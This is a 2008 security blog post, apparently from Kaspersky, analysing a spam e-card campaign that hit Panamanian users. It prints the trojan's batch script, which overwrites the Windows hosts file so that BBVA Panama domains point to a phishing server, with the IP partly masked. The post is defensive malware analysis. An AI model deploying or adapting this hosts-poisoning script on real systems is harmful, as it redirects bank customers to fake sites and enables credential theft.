Panama – a tempting target

21 Apr 2008

minute read

Authors

Dmitry Bestuzhev

We recently got back from Panama, where we took part in a conference on cyber crime in Latin America.

Although Costa Rica is the country with the highest Internet penetration rate, Panama leads the rankings with the highest number of successful attacks. And what makes Panama such a tempting target? The flourishing economy and a free trade zone have led to a huge number of banks making their home in the country – and the successful attacks are attacks on banks.

Our conference presentation highlighted that today attacks are often highly local: they’re tailored to a specific country, target a specific group within that country, and, as a rule, they generally don’t spread beyond the bounds of the region or even the state. This is a tactic designed to extend the life cycle of the malicious programs used to conduct the attack – localized attacks minimize the risk of being detected by antivirus companies.

Pretty much as soon as we got back from Panama one of these attacks broke out. Email users in the .pa domain were spammed with an email inviting them to pick up an e-card from the Latin American service Gusanito.com. When the user clicks the link, a file called 001002003.exe downloads to the victim machine and then conducts the following operation:

@echo off
title AVERSINODETECTA———-HAHAHAHAHAHAHAHAHAHAHA
del c:WINDOWSsystem32driversetchosts
copy hosts c:WINDOWSsystem32driversetchosts
echo 75.127.*.* www.bbvapanama.com >>%windir%System32driversetchosts
echo 75.127.*.* bbvapanama.com >>%windir%System32driversetchosts
echo 75.127.*.* www.bbvanetpanama.com >>%windir%System32driversetchosts
echo 75.127.*.* bbvanetpanama.com >>%windir%System32driversetchosts
exit
echo > “C:DOCUME~1ADMINI~1LOCALS~1Temptmpfile0.tmp”

The malicious program adds an IP record for the BBV Panama domain to the local DNS file. The ‘title’ field, which includes a phrase meaning ‘They might not notice’, indicates that the author is almost certainly Spanish speaking.

If the victim of the attack is a client of the bank and tries to visit the bank’s site, s/he will be automatically redirected to a fake site which is, as usual, an exact copy of the original site.

As I mentioned above, malicious users try and spread their creations within a limited area in order to evade detection by antivirus solutions for as long as possible. This case shows that the tactic does work, to some extent – three days after the attack, only 2 antivirus companies were detecting the malicious program. One of them was Kaspersky Anti-Virus, which detects the culprit behind this latest attack as Trojan.Win32.Qhost.alc.

Authors

Dmitry Bestuzhev

Panama – a tempting target

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Latest Posts

Latest Webinars

Reports

Kaspersky GReAT experts dive deep into the BlueNoroff APT’s GhostCall and GhostHire campaigns. Extensive research detailing multiple malware chains targeting macOS, including a stealer suite, fake Zoom and Microsoft Teams clients and ChatGPT-enhanced images.

Kaspersky researchers discovered previously unidentified commercial Dante spyware developed by Memento Labs (formerly Hacking Team) and linked it to the ForumTroll APT attacks.

Kaspersky GReAT experts describe the latest Mysterious Elephant APT activity. The threat actor exfiltrates data related to WhatsApp and employs tools such as BabShell and MemLoader HidenDesk.

According to Kaspersky, Librarian Ghouls APT continues its series of attacks on Russian entities. A detailed analysis of a malicious campaign utilizing RAR archives and BAT scripts.

Panama – a tempting target

GReAT Ideas. Balalaika Edition

GReAT Ideas. Green Tea Edition

GReAT Ideas. Powered by SAS: malware attribution and next-gen IoT honeypots

GReAT Ideas. Powered by SAS: threat actors advance on new fronts

GReAT Ideas. Powered by SAS: threat hunting and new techniques

Cyberthreats to financial organizations in 2022

Targeted ransomware: it’s not just about encrypting your data!

AZORult spreads as a fake ProtonVPN installer

The world’s southernmost security conference

Cybercriminals target early IRS 2018 refunds now

Deep analysis of the flaw in BetterBank reward logic

Post-exploitation framework now also delivered via npm

Massive npm infection: the Shai-Hulud worm and patient zero

The SOC files: Rumble in the jungle or APT41’s new target in Africa

XZ backdoor: Hook analysis

Latest Posts

The evolving landscape of email phishing attacks: how threat actors are reusing and refining established techniques

PassiveNeuron: a sophisticated campaign targeting servers of high-profile organizations

Post-exploitation framework now also delivered via npm

SEO spam and hidden links: how to protect your website and your reputation

Latest Webinars

Fortify your mobile protection: Building customer trust with advanced security

Unmasking email dangers: Detecting and defending against mail threats

Kaspersky Scan Engine: Built to integrate, engineered to protect

Kaspersky’s way of cloud workload protection

Reports

Crypto wasted: BlueNoroff’s ghost mirage of funding and jobs

Mem3nt0 mori – The Hacking Team is back!

Mysterious Elephant: a growing threat

Sleep with one eye open: how Librarian Ghouls steal data by night

Subscribe to our weekly e-mails